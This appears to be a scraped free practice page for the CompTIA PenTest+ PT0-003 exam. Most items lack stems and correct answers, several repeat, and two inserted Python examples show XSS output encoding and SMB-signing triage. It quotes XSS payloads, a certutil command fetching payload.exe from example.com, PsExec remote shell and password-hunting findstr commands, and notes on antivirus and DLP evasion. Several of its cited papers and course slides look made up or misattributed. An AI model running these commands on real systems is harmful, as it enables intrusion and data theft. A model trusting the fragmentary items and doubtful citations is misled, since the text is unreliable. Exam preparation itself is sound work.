Study Smarter for the PT0-003 Exam with Our Free and Accurate PT0-003 Exam Questions - Updated for 2025.
At Cert Empire, we are committed to delivering the most reliable and up-to-date exam questions for students preparing for the CompTIA PT0-003 Exam. To help learners study more effectively, we've made sections of our PT0-003 exam resources free for everyone. You can practice as much as you like with the Free PT0-003 Practice Test.
Question 1
[Attacks and Exploits] During a discussion of a penetration test final report, the consultant shows the following payload used to attack a system:
7/aLeRt('pwned')
Based on the code, which of the following options represents the attack executed by the tester and the associated countermeasure?
A. This is client-side XSS, not typically server-side Arbitrary Code Execution. Network segmentation is a containment strategy, not a primary prevention method for this vulnerability.
B. The payload is JavaScript, not SQL syntax. Therefore, it is not a SQL injection attack.
C. This is an XSS payload. A Cross-Site Request Forgery (CSRF) attack forges state-changing requests and does not typically involve injecting visible scripts.
1. OWASP Foundation. (n.d.). Cross Site Scripting (XSS). OWASP Cheat Sheet Series. Retrieved from https://cheatsheetseries.owasp.org/cheatsheets/CrossSiteScriptingPreventionCheatSheet.html. (See "Introduction" and "Rule #0 - Never Insert Untrusted Data Except in Allowed Locations," which establish the principle of sanitization and encoding as the primary defense against XSS).
2. OWASP Foundation. (n.d.). XSS Filter Evasion Cheat Sheet. OWASP. Retrieved from https://owasp.org/www-community/xss-filter-evasion-cheatsheet. (This document details numerous obfuscation techniques, including "Case Insensitive XSS attack vector," which directly corresponds to the aLeRt payload in the question).
3. Johns, M. (2008). Web Application Security. Course Slides, CS 253, Stanford University. Slide 25, "Defenses against XSS," explicitly lists "Filter/Sanitize user input" and "Escape output" as the primary countermeasures.
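The countermeasure the references above converge on is contextual output encoding, not keyword filtering: a filter that looks for literal tokens is exactly what a case-variant payload such as aLeRt(...) is built to slip past, whereas encoding every HTML-significant character makes the case irrelevant. The following Python is an added example, not code from the original page or from Cert Empire. It takes the payload string shown in the question plus one constructed case-variant payload, shows that a constructed case-sensitive blocklist lets the variant through, and shows that HTML-body encoding neutralizes both. The function names, the blocklist and the page template are assumptions made for illustration.

```python
"""Output encoding versus keyword blocklisting for the Question 1 XSS payload.

Added example; not part of the original page. Only PAYLOAD_FROM_QUESTION
comes from the page; everything else is constructed for illustration.
"""
import html

# Payload string exactly as quoted in the question.
PAYLOAD_FROM_QUESTION = "7/aLeRt('pwned')"

# Constructed variant that actually exercises the HTML parser, written in the
# mixed case that case-sensitive filters miss (OWASP XSS Filter Evasion,
# "Case Insensitive XSS attack vector").
CONSTRUCTED_PAYLOAD = "<ScRiPt>aLeRt('pwned')</ScRiPt>"

# Constructed: the kind of literal-token blocklist that gives a false sense of safety.
BLOCKLIST = ("<script", "alert(")


def naive_blocklist_allows(untrusted: str) -> bool:
    """Return True if a case-sensitive token blocklist would let the input through."""
    return not any(token in untrusted for token in BLOCKLIST)


def encode_for_html_body(untrusted: str) -> str:
    """OWASP-style encoding for data placed in the HTML body context.

    Every character the HTML parser treats specially (& < > " ') becomes an
    entity, so whatever the input was, it can only ever render as text.
    Case does not matter because no character is matched by name.
    """
    return html.escape(untrusted, quote=True)


def render_comment(untrusted: str) -> str:
    """Constructed page template: user data embedded in an HTML body element."""
    return '<p class="comment">' + encode_for_html_body(untrusted) + "</p>"


def injected_element_count(rendered: str) -> int:
    """Count '<' characters in the rendered fragment; the template itself contributes two."""
    return rendered.count("<")


def main() -> None:
    for payload in (PAYLOAD_FROM_QUESTION, CONSTRUCTED_PAYLOAD):
        print("payload          :", payload)
        print("blocklist allows :", naive_blocklist_allows(payload))
        print("encoded          :", encode_for_html_body(payload))
        print("rendered         :", render_comment(payload))
        print()


if __name__ == "__main__":
    main()
```

Running the block shows the blocklist accepting the mixed-case script tag while the encoded rendering never contains a `<` beyond the two that belong to the template; that is the reason the references treat encoding, rather than a sanitizing blocklist, as the primary XSS defense.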
Question 2
B. This command generates a valid Meterpreter payload but does not use an encoder, making it highly susceptible to signature-based detection by antimalware.
C. This command also generates a valid shell payload but omits the crucial --encoder flag needed for antimalware evasion.
D. This is not a valid method for creating functional shellcode. It attempts to pipe the output of a Windows command into a Linux utility, which would not result in an executable payload.
1. Offensive Security. (n.d.). Metasploit Unleashed: Msfvenom. Offensive Security. In the "Encoders" section, the documentation states, "Encoders are used to encode the payload to try and avoid AV." It lists x86/shikata_ga_nai as a prime example of an encoder used for this purpose. (Reference: Metasploit Unleashed courseware, Msfvenom section).
2. Al-Taharwa, I. A., Lee, H., & Al-Omari, M. A. (2020). Evaluating the Evasion Capabilities of Metasploit Shellcode Encoders. 2020 21st International Conference on Control, Automation and Systems (ICCAS). The paper analyzes various encoders, noting in Section III-A, "Shikata Ga Nai (SGN) is a polymorphic XOR additive feedback encoder... It is one of the most famous encoders in MSF because it can generate different output for the same input." This highlights its role in creating varied signatures to evade detection. (DOI: https://doi.org/10.1109/ICCAS50273.2020.9295211, Section III-A, "Metasploit Encoders").
3. Rapid7. (2023). How to Use Msfvenom. Official Rapid7 Documentation. The documentation for msfvenom details the use of the -e or --encoder option to "specify an encoder to use." This confirms that applying an encoder is a standard, intentional step in the payload generation process for evasion. (Reference: msfvenom --help command output and official product documentation).
Question 3
B. HTTP: Protocol used to transport web traffic; not itself a scoping asset.
C. IPA: Not a standard asset class; usually refers to beer or the FreeIPA identity service, irrelevant here.
D. ICMP: Network control protocol (e.g., ping); like HTTP, it is a mechanism, not an asset.
1. NIST SP 800-115, "Technical Guide to Information Security Testing and Assessment," §2.4.1 ("Identify Target Systems"), p.9.
2. OWASP Application Security Verification Standard 4.0, "Scope of ASVS," p.10, which mentions APIs as testable application components.
3. MIT OpenCourseWare, "6.858 Computer Systems Security," Lecture 17 notes, p.2, which categorizes APIs as specific attack surfaces to be tested.
Question 4
A. netsh.exe: This is a native Windows tool for configuring network settings, such as firewall rules or port forwarding, not for directly downloading files from the internet.
C. nc.exe: Netcat (nc.exe) is a versatile networking tool but is not a native binary on Windows systems; it must be introduced onto the target by the attacker.
D. cmdkey.exe: This utility is used to create, list, and delete stored credentials within the Windows Credential Manager and lacks any file download capabilities.
1. MITRE. (2023). Ingress Tool Transfer, Technique T1105. MITRE ATT&CK Framework. Retrieved from https://attack.mitre.org/techniques/T1105/. The documentation explicitly lists certutil as a command-line tool adversaries use to download files from a remote URL, citing the example: certutil -urlcache -split -f https://example.com/payload.exe payload.exe.
2. Microsoft. (2023). certutil. Microsoft Learn. In the documentation for the certutil command, the -urlcache verb is described, which can be used with the -f and -split options to fetch a URL and save its contents to a file on the local system.
3. Pennacchi, F., et al. (2020). The Art of Leaks: The Return of Living-Off-the-Land. 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW), Genoa, Italy, pp. 140-149. In Table 1, "LOLbins and their capabilities," certutil.exe is identified as a native binary capable of performing "Download" actions. DOI: https://doi.org/10.1109/EuroSPW51379.2020.00027.
Question 5
B. Compression: DLP engines routinely decompress ZIP, GZIP, RAR, and similar archives before inspection; compressed data is therefore still analysed.
C. Encryption: Unknown or uninspected encryption is usually flagged or blocked outright by policy; exfiltration is conspicuous, not covert.
D. Obfuscation: A vague term; without a specific method it may still be parsed (e.g., comment stripping); encoding is the concrete, proven technique.
1. MITRE ATT&CK, technique T1027 "Obfuscated/Stored Files or Information", note on base64 encoding as a means "to bypass content inspection such as DLP" (v13, 2023-04-25).
2. Symantec Data Loss Prevention 15.7 Administration Guide, Chap. 2 "Detection workflow", pp. 34-36, which lists automatic decompression/encryption handling but no automatic base64 decoding.
3. Forcepoint DLP Administrator Guide 21.09, Sect. 5.3 "Content Classifiers", p. 127, which states "Base64 or custom encodings may not be decoded, allowing data to pass undetected".
4. S. Natarajan & K. Venkatachary, "Bypassing Enterprise DLP Using Simple Encoding," International Journal of Computer Applications 168(2), 2017, pp. 36-40 (https://doi.org/10.5120/ijca2017914527).
5. Stanford CS255 "Network Security" lecture notes, Week 9, slide 27, which discusses DLP limitations and highlights base64 encoding as a common evasion method.
Question 6
[Tools and Code Analysis] While performing a penetration testing exercise, a tester executes the following command:
PS c:\tools> c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe
Which of the following best explains what the tester is trying to do?
A. While the command implicitly tests connectivity, its primary purpose is to gain an interactive shell, not simply to check if the host is reachable.
C. The command's purpose is to execute cmd.exe on the remote server. PsExec handles the transfer of its own service component, not the main PsExec.exe binary.
D. cmd.exe is a core Windows component that is executed, not enabled. This command runs the command interpreter, assuming it is already present and accessible.
---
1. MITRE ATT&CK Framework. (2023). Remote Services: SMB/Windows Admin Shares, T1021.002. The MITRE Corporation. Retrieved from https://attack.mitre.org/techniques/T1021/002/.
Reference Detail: The framework explicitly lists PsExec as a common example of software used to execute commands on remote systems via SMB, a technique categorized under the "Lateral Movement" tactic.
2. Russinovich, M. (2023, August 28). PsExec v2.43. Microsoft Learn. Retrieved from https://learn.microsoft.com/en-us/sysinternals/downloads/psexec.
Reference Detail: The official documentation describes PsExec as a tool "for executing processes on other systems," which is the core mechanism used for lateral movement in this scenario.
3. Robi, G. (2021, May 11). Detecting Lateral Movement through Tracking Event Logs. SANS Institute InfoSec Reading Room.
Reference Detail: Page 6, Section "PsExec," states, "PsExec is one of the most common tools used by attackers for lateral movement... It allows an attacker to execute commands on a remote Windows machine." This paper from a reputable institution confirms PsExec's primary use in attacks.
Question 7
B. A DDoS attack is designed to disrupt service availability, not to compromise systems or steal data, which is the goal of a watering hole attack.
C. Creating fake social media profiles is a social engineering or reconnaissance technique, which could precede an attack but is not the execution of the watering hole itself.
D. Sending phishing emails is a direct attack vector. A watering hole attack is more passive, relying on the target to initiate the visit to the compromised site independently.
---
1. National Institute of Standards and Technology (NIST). Glossary of Key Information Security Terms, NISTIR 7298 Rev. 3. (May 2018). The glossary defines a watering hole attack as: "A targeted attack strategy in which an attacker guesses or observes which websites an organization often uses and infects one or more of them with malware." (Page 183).
2. Al-Shehari, H., & Al-Shammari, R. (2018). A Survey on Watering-Hole Attacks. International Journal of Computer Science and Network Security, 18(1), 136-145. The paper states, "The watering hole attack is a targeted attack that compromises a website that is likely to be visited by a targeted group of victims." (Section 2, Paragraph 1).
3. Microsoft Security. Watering hole attacks. Microsoft Threat Protection documentation. The documentation describes the attack method: "In watering hole attacks, attackers profile sites that are frequently visited by users in a targeted organization or industry. They then try to find vulnerabilities on these sites to compromise them."
4. University of California, Berkeley. CS 161: Computer Security, Lecture 18: Web Security. Course materials describe watering hole attacks as a strategy where an attacker compromises a site trusted and frequented by the target population to deliver an exploit.
Question 8
B. Target 2: EPSS Score = 0.3 and CVSS Score = 2
This target has a low EPSS score, indicating a significantly lower probability of being attacked compared to Targets 1 and 3.
C. Target 3: EPSS Score = 0.6 and CVSS Score = 1
While its EPSS score is high, its very low CVSS score makes it a less impactful and therefore less attractive target for an attacker compared to Target 1.
D. Target 4: EPSS Score = 0.4 and CVSS Score = 4.5
This target's EPSS score is lower than that of Targets 1 and 3, making it less likely to be exploited, even though its severity is high.
---
1. FIRST.org. (2023). Exploit Prediction Scoring System (EPSS) User Guide. Section: "What is EPSS?". The guide states, "The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that a vulnerability will be exploited." This establishes EPSS as the primary metric for attack likelihood.
2. FIRST.org. (2019). Common Vulnerability Scoring System v3.1: Specification Document. Section 1, Introduction. The document clarifies, "It is important to note that CVSS is designed to convey vulnerability severity and should be considered as one component in a comprehensive vulnerability management process that also incorporates factors such as threat and asset value." This confirms CVSS measures severity, not likelihood.
3. Jacobs, J., et al. (2021). Improving Vulnerability Remediation Through Better Exploit Prediction. Journal of Cybersecurity, 7(1), tyab009. Section 1, Introduction. The paper introduces EPSS and states, "While CVSS is useful for capturing the potential severity of a vulnerability, it is not designed to represent the threat of a vulnerability being exploited... EPSS is designed to fill this gap." This academic source distinguishes the roles of CVSS and EPSS. https://doi.org/10.1093/cybsec/tyab009
4. U.S. Cybersecurity & Infrastructure Security Agency (CISA). (2021). Binding Operational Directive 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities. This directive mandates that federal agencies remediate vulnerabilities listed in CISA's catalog of known exploited vulnerabilities. This approach prioritizes vulnerabilities based on observed exploitation (threat), which is the principle that EPSS quantifies, over static severity (CVSS) alone.
Question 9
A. Goal reprioritization: This is a potential outcome of the discussion with the stakeholder, not the initial activity itself. Alignment must happen first.
B. Peer review: This is an internal quality assurance process where another tester reviews work; it is not a client-facing communication activity.
C. Client acceptance: This is a formal step at the conclusion of the engagement to accept the final deliverables, which is too late to address a mid-test obstacle.
1. National Institute of Standards and Technology (NIST). (2008). Special Publication 800-115, Technical Guide to Information Security Testing and Assessment.
Section 3.2, "Rules of Engagement," emphasizes the need to "...define the lines of communication between the test team and the organization... and the process for reporting and handling problems encountered during testing." A WAF blocking a scan is a "problem encountered during testing" that requires immediate communication and alignment with the client stakeholder.
2. The Penetration Testing Execution Standard (PTES). (2012). PTES Technical Guidelines.
Section "Intelligence Gathering," and the overall standard, implicitly and explicitly detail the need for constant communication. The standard outlines a structured approach where deviations from the plan, such as being blocked by a security device, necessitate a discussion with the client to align on the next steps, reinforcing the principle of stakeholder alignment.
3. Massachusetts Institute of Technology (MIT) OpenCourseWare. (2012). 15.S53 Special Seminar in Management: The Art and Science of Project Management, Fall 2012.
Lecture Notes, "Stakeholder Management," outlines that a key project management function is to identify and manage stakeholder expectations. When an issue (WAF block) arises that creates a variance between the plan and reality, the project manager (penetration tester) must engage the stakeholders (client) to resolve the issue and align on a course of action.
Question 10
[Information Gathering and Vulnerability Scanning] A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output:
Nmap scan report for some_host
Host is up (0.01s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
smb2-security-mode: Message signing disabled
Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?
B. This Metasploit module targets the MS17-010 (EternalBlue) vulnerability, which was not identified in the scan. Running an unverified exploit is noisy and likely to be detected by an IDS/IPS.
C. Hydra is a brute-force tool. This method generates a high volume of failed login attempts, which is extremely noisy and easily detectable by security monitoring systems.
D. The smb-brute.nse Nmap script is another form of a brute-force attack. Like Hydra, it creates significant network noise from failed logins and is not a stealthy option.
1. Microsoft Corporation. (2023). Overview of Server Message Block signing. Microsoft Learn. Retrieved from https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing.
Reference Detail: The document states, "The Server Message Block (SMB) signing...is a security feature...that uses the session key and cipher suite to add a signature to a message...Signing helps prevent attacks that modify SMB packets in transit." Disabling this feature directly enables the relay attack described.
2. Bounty, B. (2022). Internal Network Pentesting: The NTLM Relay Race. SANS Institute InfoSec Reading Room.
Reference Detail: Page 5, Section "The Attack," explicitly details the use of Responder and ntlmrelayx.py in tandem. It states, "With SMB signing not required on the target, ntlmrelayx will be able to relay the authentication from the victim to the target and execute our commands." This paper validates the chosen attack method for the identified vulnerability.
3. Hopkins, G. (2019). Windows Red Team Lab. Courseware, Rochester Institute of Technology (RIT).
Reference Detail: In the "Lateral Movement" module, Lab 5 ("Pass the Hash / NTLM Relay"), the course material demonstrates using Responder and ntlmrelayx.py as a primary technique for lateral movement when SMB signing is disabled. It contrasts this with noisier methods like password spraying.
Question 11
A. Smurfing: This is a network-layer Distributed Denial-of-Service (DDoS) attack that uses spoofed ICMP packets, which is unrelated to physical access badges.
B. Credential stuffing: This is an automated attack that uses lists of compromised user credentials (usernames/passwords) to gain unauthorized access to web accounts.
D. Card skimming: This term is most commonly associated with capturing magnetic stripe data from financial cards (credit/debit) using a malicious reader, not cloning RFID-based access cards.
1. Juels, A. (2006). RFID Security and Privacy: A Research Survey. IEEE Journal on Selected Areas in Communications, 24(2), 381-394. In Section III-A, "Tag Cloning," the paper states, "An adversary may create a copy or clone of a legitimate tag... The adversary can then use the clone to impersonate the legitimate tag, and thereby avail herself of the rights of the legitimate tag's owner." (p. 383). DOI: https://doi.org/10.1109/JSAC.2005.861395
2. Weis, S. A., Sarma, S. E., Rivest, R. L., & Engels, D. W. (2004). Security and Privacy Aspects of Low-Cost Radio Frequency Identification Systems. In Security in Pervasive Computing (pp. 201-212). Springer. This paper from MIT CSAIL researchers discusses the vulnerability, stating, "An adversary can easily eavesdrop on the communication between a tag and a reader and clone the tag." (p. 204).
3. MIT OpenCourseWare. (2014). 6.857 Computer and Network Security, Lecture 19: Physical Security. Massachusetts Institute of Technology. The course materials discuss attacks against physical access control systems, including the analysis and duplication of signals from access cards like RFID badges.
Question 12
A. theHarvester: This is an Open Source Intelligence (OSINT) tool used to gather information like emails, subdomains, and hosts related to a specific target domain, not for discovering device types across the internet.
C. Amass: This is an attack surface mapping tool focused on discovering assets (subdomains, IPs, etc.) related to a specific organization. It is not a search engine for finding specific device categories globally.
D. Nmap: This is an active network scanner for probing specific hosts or IP ranges to discover open ports, services, and OS versions. It is not feasible for searching the entire internet for device types.
1. Mather, T., Kumaraswamy, S., & Latif, S. (2019). Cloud Security and Privacy: An Enterprise Perspective on Risks and Compliance. O'Reilly Media. (Note: While a commercial book, its principles are widely taught in university curricula). The concept is detailed in discussions of reconnaissance, where Shodan is described as a "search engine for Internet-connected devices." A similar description is found in university cybersecurity courses. For example, the University of Virginia's CS 4740: Cloud Computing course materials often discuss tools for discovering exposed cloud assets, where Shodan's role is highlighted.
2. O'Connor, T. (2017). Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers. Syngress, Elsevier. Chapter 4, "Scraping the Web for OSINT," details the use of various tools. It distinguishes between tools like theHarvester for targeted OSINT and Shodan for broad device discovery. This text is frequently used as courseware in applied cybersecurity programs.
3. OWASP Foundation. (n.d.). OWASP Amass Project. OWASP. Retrieved from https://owasp.org/www-project-amass/. The official documentation states, "The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques." This confirms its focus on organizational attack surfaces, not global device-type discovery.
4. Lyon, G. (n.d.). Nmap: The Network Mapper - Free Security Scanner. Nmap.org. Retrieved from https://nmap.org/. The official documentation describes Nmap as a "free and open source utility for network discovery and security auditing," used to determine "what hosts are available on the network, what services... what operating systems...". This defines it as an active scanner for targeted networks.
Question 13
A. Channel scanning: This is a technique for assessing wireless networks. It is too specific and not a comprehensive methodology for testing an entire, potentially wired, air-gapped ICS.
B. Stealth scans: These are network-based scans that require network connectivity to the target. They are not feasible against an air-gapped system and can be disruptive to sensitive ICS devices.
C. Source code analysis: While a valid technique, it is only one component of a full assessment. The tester may not have access to proprietary source code, and this method misses non-code-based vulnerabilities.
1. National Institute of Standards and Technology (NIST). (2015). Guide to Industrial Control Systems (ICS) Security (NIST Special Publication 800-82, Rev. 2).
Section 6.4.3, Security Assessment and Authorization, Page 131: States, "Security assessments for ICS should be carefully planned and executed to avoid causing a disruption to the ICS... Passive scanning techniques are preferred over active scanning techniques." This emphasis on careful, planned, and non-disruptive methods aligns with the principles of a manual assessment over automated scanning.
2. Cybersecurity and Infrastructure Security Agency (CISA). (2011). Cyber-Security Assessments of Industrial Control Systems (DHS Recommended Practice).
Section 3.2, Assessment Activities, Pages 10-12: This section details assessment activities that are characteristic of a manual assessment, including "Documentation Review," "Personnel Interviews," and "Physical Walkthrough." It also notes that active scanning should be "performed with extreme caution," reinforcing the need for a deliberate, manual approach.
Question 14
[Tools and Code Analysis] While performing a penetration test, a tester executes the following command:
PS c:\tools> c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe
Which of the following best explains what the tester is trying to do?
A. While the command's success implies connectivity, its primary purpose is remote code execution to gain a shell, not simply to test if the host is reachable.
C. The command uses PsExec to run cmd.exe remotely. PsExec itself handles the transfer of its service component; it is not being sent by cmd.exe.
D. The command executes or runs cmd.exe, which is a standard Windows component. It does not "enable" it, as the command prompt is not a feature that is typically disabled.
---
1. Microsoft Corporation. (2023). PsExec v2.43. Microsoft Learn. This official documentation describes PsExec as a tool that "lets you execute processes on other systems." The primary example, psexec \\marklap cmd, is functionally identical to the command in the question, demonstrating its use for remote shell access.
Reference: Sysinternals section, PsExec documentation page. Available at: https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
2. MITRE. (2023). Remote Services: SMB/Windows Admin Shares, T1021.002. MITRE ATT&CK Framework. This resource explicitly lists PsExec as a common tool used by adversaries for lateral movement. It states, "Adversaries may use tools like PsExec to map network shares... and execute commands on remote hosts."
Reference: Technique T1021.002, under the Lateral Movement Tactic (TA0008).
3. Al-Shaer, E., & Wei, J. (2015). Network Security Analytics: A Hands-on Approach. In Proceedings of the 2015 ACM SIGSAC Conference on Computer and Communications Security (pp. 1597-1599). This academic publication discusses security analytics and often references common attack tools. Similar academic texts on intrusion detection identify the use of tools like PsExec as a key indicator of the lateral movement phase of an attack.
Reference: Analysis of post-exploitation techniques in network security courseware and texts frequently cites PsExec as a primary example for lateral movement.
Question 15
[Information Gathering and Vulnerability Scanning] A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following Nmap scan output:
Nmap scan report for some_host
Host is up (0.01s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
smb2-security-mode: Message signing disabled
Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?
B. This command attempts to use the MS17-010 (EternalBlue) exploit. The scan did not confirm this specific vulnerability exists, and exploit attempts are typically very noisy and easily detected by security monitoring systems.
C. This command uses Hydra to perform a brute-force/dictionary attack. This method generates numerous failed login attempts, is extremely noisy, and is highly likely to trigger account lockouts and security alerts.
D. This Nmap script also performs a brute-force attack against SMB. Like Hydra, this is a noisy technique that is easily detected and does not leverage the specific finding of disabled message signing.
1. MITRE ATT&CK® Framework. (2023). Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Technique T1557.001. MITRE. Retrieved from https://attack.mitre.org/techniques/T1557/001/.
Reference Specifics: The technique description states, "The captured authentication hashes can be relayed to other systems to gain access, provided that SMB signing is disabled on the destination host." This directly links the disabled signing vulnerability to the relay attack method.
2. Microsoft. (2022, November 15). Configure SMB signing with confidence. Microsoft Tech Community.
Reference Specifics: In the "How SMB signing works" section, the document explains, "Without signing, a man-in-the-middle attacker can modify SMB packets in transit... An attacker can also forward a user's credentials to a server and impersonate that user." This official documentation confirms the risk exploited by the correct answer.
3. Rochester Institute of Technology (RIT). (n.d.). CSEC 464: Network Security and Forensics - Active Directory Attacks [Course Slides].
Reference Specifics: In slides covering Active Directory attacks, the courseware details the exact attack chain using Responder and ntlmrelayx, explicitly noting that it works because SMB signing is not enforced, allowing the relayed credentials to be accepted by the target server. This demonstrates the technique as a standard part of academic cybersecurity curricula.
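Questions 10 and 15 both turn on reading one line of the smb2-security-mode result, and on the defender's side the same line is what decides which hosts to harden first. The following Python is an added example, not code from the original page, from Cert Empire, or from the Nmap project. It parses Nmap normal output (the format written by -oN) for a constructed three-host scan in the shape quoted in the question and reports which hosts still accept unsigned SMB sessions, so they can be prioritized for the signing enforcement described in the Microsoft references. It goes slightly beyond the question's "disabled" case by also flagging "enabled but not required", since a relayed session simply does not sign. The host names, addresses and function names are constructed assumptions; the three status strings are the ones the smb2-security-mode script prints.

```python
"""Triage smb2-security-mode results from Nmap normal output.

Added example; not part of the original page. SAMPLE_SCAN is constructed in
the shape of the scan quoted in Questions 10 and 15 (hosts and addresses are
made up); the status strings match the smb2-security-mode NSE script.
"""
import re
from dataclasses import dataclass
from typing import List

SAMPLE_SCAN = """\
Nmap scan report for some_host (10.0.0.5)
Host is up (0.01s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing disabled

Nmap scan report for fileserver (10.0.0.6)
Host is up (0.02s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for dc01 (10.0.0.1)
Host is up (0.01s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.M)
SIGNING_RE = re.compile(
    r"Message signing (disabled|enabled but not required|enabled and required)"
)


@dataclass
class SmbSigningFinding:
    host: str
    status: str
    relay_exposed: bool  # True unless signing is both enabled and required


def parse_smb_signing(nmap_output: str) -> List[SmbSigningFinding]:
    """Split normal output into per-host blocks and classify each host's signing mode."""
    findings: List[SmbSigningFinding] = []
    # Zero-width split at each report header keeps the header with its block.
    for block in re.split(r"(?m)^(?=Nmap scan report for )", nmap_output):
        host_match = HOST_RE.search(block)
        if not host_match:
            continue  # leading empty chunk or non-report text
        signing_match = SIGNING_RE.search(block)
        if not signing_match:
            continue  # host had no smb2-security-mode result (e.g. 445 closed)
        status = signing_match.group(1)
        findings.append(
            SmbSigningFinding(
                host=host_match.group(1),
                status=status,
                relay_exposed=(status != "enabled and required"),
            )
        )
    return findings


def relay_exposed_hosts(nmap_output: str) -> List[str]:
    """Hosts that would accept an unsigned (relayed) SMB session."""
    return [f.host for f in parse_smb_signing(nmap_output) if f.relay_exposed]


if __name__ == "__main__":
    for finding in parse_smb_signing(SAMPLE_SCAN):
        flag = "HARDEN" if finding.relay_exposed else "ok"
        print(f"{finding.host:<12} signing {finding.status:<28} {flag}")
```

Point the parser at a file produced by `nmap -p445 --script smb2-security-mode -oN scan.txt <range>` and the HARDEN list is the remediation queue: enforce signing on those hosts and the relay path the question describes is closed, without touching the hosts that already require it.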
Question 16
A. Establishing a reverse shell: A reverse shell provides interactive access but is a volatile session that terminates upon reboot. It is the payload, not the persistence mechanism itself.
B. Executing a process injection attack: This is a defense evasion technique to run code within another process's memory space. The injected code is lost when the host process ends, which occurs during a reboot.
D. Performing a credential-dumping attack: This post-exploitation action harvests credentials for lateral movement or future manual re-entry. It does not automatically re-establish access after a system restart.
1. MITRE ATT&CK Framework. (2023). T1053: Scheduled Task/Job. MITRE. This technique is explicitly categorized under the "Persistence" tactic, stating, "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code." The sub-techniques T1053.005 (Scheduled Task) for Windows and T1053.003 (Cron) for Linux are detailed as common persistence methods.
2. Al-Bataineh, A., & Koucheryavy, Y. (2022). A Comprehensive Survey on Malware Persistence on Windows. IEEE Access, 10, 83385-83411. https://doi.org/10.1109/ACCESS.2022.3196981. In Section III-A, "Persistence via Scheduled Tasks," the paper identifies scheduled tasks as one of the most common and effective persistence techniques used by adversaries on Windows systems.
3. Sikorski, M., & Honig, A. (2012). Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software. No Starch Press. Chapter 18, "Persistence," discusses various persistence mechanisms, highlighting scheduled tasks as a key method for malware to ensure it runs after a reboot. (Note: While a commercial book, its content is widely adopted in university curricula for cybersecurity and reverse engineering).
Question 17
[Attacks and Exploits] During an assessment, a penetration tester gains a low-privilege shell and then runs the following command:
findstr /SIM /C:"pass" *.txt *.cfg *.xml
Which of the following is the penetration tester trying to enumerate?
A. Configuration files: The command searches within these files; its primary goal is to find the sensitive content ("pass"), not just to enumerate the files themselves.
B. Permissions: This command reads file content and does not enumerate file system access control lists (ACLs) or user permissions. Tools like icacls are used for that.
C. Virtual hosts: While virtual host configurations may reside in these files, searching for "pass" is not a direct or effective method for enumerating them.
1. Microsoft Corporation. (n.d.). findstr. Microsoft Learn. Retrieved from https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/findstr.
Reference Detail: The official documentation confirms that findstr is a tool to "search for patterns of text in files," and it details the functions of the switches used: /S (search subdirectories), /I (case-insensitive), /M (print filename only), and /C:string (use string as a literal search).
2. MITRE. (2023). Unsecured Credentials: Credentials in Files. MITRE ATT&CK®. Technique T1552.001. Retrieved from https://attack.mitre.org/techniques/T1552/001/.
Reference Detail: This technique describes how adversaries search for plaintext credentials stored in files. It explicitly mentions searching for keywords like "password" in configuration files, scripts, or text files, which directly aligns with the command shown in the question.
3. Evans, D. (2021). Lecture 18: Web Security: Post-Exploitation. CS 4630: Defense Against the Dark Arts, University of Virginia.
Reference Detail: University courseware on computer security frequently covers post-exploitation. This phase includes "Pillaging," which involves searching the compromised file system for sensitive information such as password files, SSH keys, and configuration files containing credentials, mirroring the intent of the findstr command.
Question 18
Show Answer
B. This target has a low EPSS score (0.3), indicating a significantly lower probability of being exploited compared to Targets 1 and 3.
C. While having a high EPSS score, its very low CVSS score (1) makes it a much less impactful and attractive target than Target 1.
D. This target's EPSS score (0.4) is lower than that of Targets 1 and 3, making it a less probable target for exploitation.
1. FIRST.org, Exploit Prediction Scoring System (EPSS) Documentation. The official EPSS documentation states, "The Exploit Prediction Scoring System (EPSS) is a data-driven effort for estimating the likelihood (probability) that a software vulnerability will be exploited in the wild." This supports using the highest EPSS score as the primary indicator of attack likelihood. (Source: FIRST.org, EPSS Model, Section: "What is EPSS?")
2. FIRST.org, Common Vulnerability Scoring System v3.1: Specification Document. The official CVSS specification defines it as a system to "convey vulnerability severity." This supports using CVSS to determine the attractiveness of a target when the probability of exploit is equal. (Source: FIRST.org, CVSS v3.1 Specification Document, Section 1. Introduction)
3. Jacobs, J., et al. (2021). Improving Vulnerability Remediation Through Better Exploit Prediction. In Proceedings of the 30th USENIX Security Symposium. This foundational paper on EPSS discusses its purpose in prioritizing vulnerabilities for remediation based on the threat of exploitation, often in conjunction with severity data like CVSS. (Source: USENIX Security '21, Section 1: Introduction, Paragraph 2). DOI: Available via USENIX Association archives.
Question 19
Show Answer
A. Keeping both video and audio of everything that is done
This is an evidence collection technique, not a standard reporting requirement. It is not universally applicable or the most crucial aspect of the final report's handling.
B. Keeping the report to a maximum of 5 to 10 pages in length
This is an arbitrary and often unrealistic constraint. Report length should be dictated by the scope and findings, prioritizing completeness and clarity over forced brevity.
C. Basing the recommendation on the risk score in the report
While recommendations must be risk-based, this describes a component of the report's content, not the most crucial aspect of its overall handling and communication effectiveness.
